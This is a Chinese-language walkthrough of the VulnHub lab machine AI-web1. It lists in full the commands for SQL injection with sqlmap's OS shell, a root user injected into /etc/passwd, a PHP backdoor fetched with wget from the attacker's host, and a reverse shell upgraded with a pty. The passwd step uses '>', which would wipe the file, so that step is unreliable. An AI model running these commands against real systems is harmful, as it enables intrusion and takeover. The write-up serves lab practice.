vulnhub之AI-web1

首先我们得主机发现
nmap扫描
命令：nmap -sP 192.168.34.0/24

打开发现，只有一行英文文字
我们扫描用一下后台目录
dirb http://192.168.34.165 -X .php,.html.txt

发现两个目录
打开看一看
只有这一个疑似sql注入，其他开两个都是没有有权限访问
我们用sqlmap跑一下，因为是post提交方法，所以我们用到–data参数
sqlmap -u “http://192.168.34.165/se3reTdir777/” --data “uid=1&Operation=Submit” --dbs

扫到了两个库，发现并没有什么用，sqlmap可以创建一个webshell，我们需要路径，

php配置文件上面找，文件名字为info.php，
其他两个加上去都找不到网页。
发现两个路径，网站跟目录放在home下面，不按常理出牌呀。
我们试一下
命令：sqlmap -u “http://192.168.34.165/se3reTdir777/” --data “uid=1&Operation=Submit” --os-shell
选项，第一个4，第二个2，
路径：/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

因为sql注入在这个页面，所以我们优先选择这个路径。

查看权限，apache用户，我们需要去root下找flag.txt
我们需要提权，查看/etc/passwd文件的权限，发现我们可以写进去。我们首先得需要去解决一下加密问题，我们需要用到kali的openssl工具，加密一下我们自己的用户，
命令：openssl passwd -1 -salt test 123456

写进用户，uid为0，gid为0，根目录为root，
命令：echo “test:$1$test$at615QShYKduQlx5z9Zm7/:0:0::/root:/bin/bash” > /etc/passwd
我们查看一下，有没有成功写入。
写入成功，我们试一下切换用户。
提示需要一个终端，所以我们得想办法反弹一个shell。
在这里我们已经得到一个shell，可以写一个后门，在这里写一个php后门。

用wget下载过去，
搭建一个简易的服务器

python -m SimpleHTTPServer 4567

wget http://192.168.34.123:4567/shell.php

下载完成。
我们用kali监听一下
并用php运行一下文件

用python弹一个交互式shell
python3 -c ‘import pty;pty.spawn("/bin/bash")’
因为靶机没有python2环境
得到shell，切换用户。

得到root用户，之后查看
cat /root/flag.txt

如果有错，或者异议咦，可以交流一下。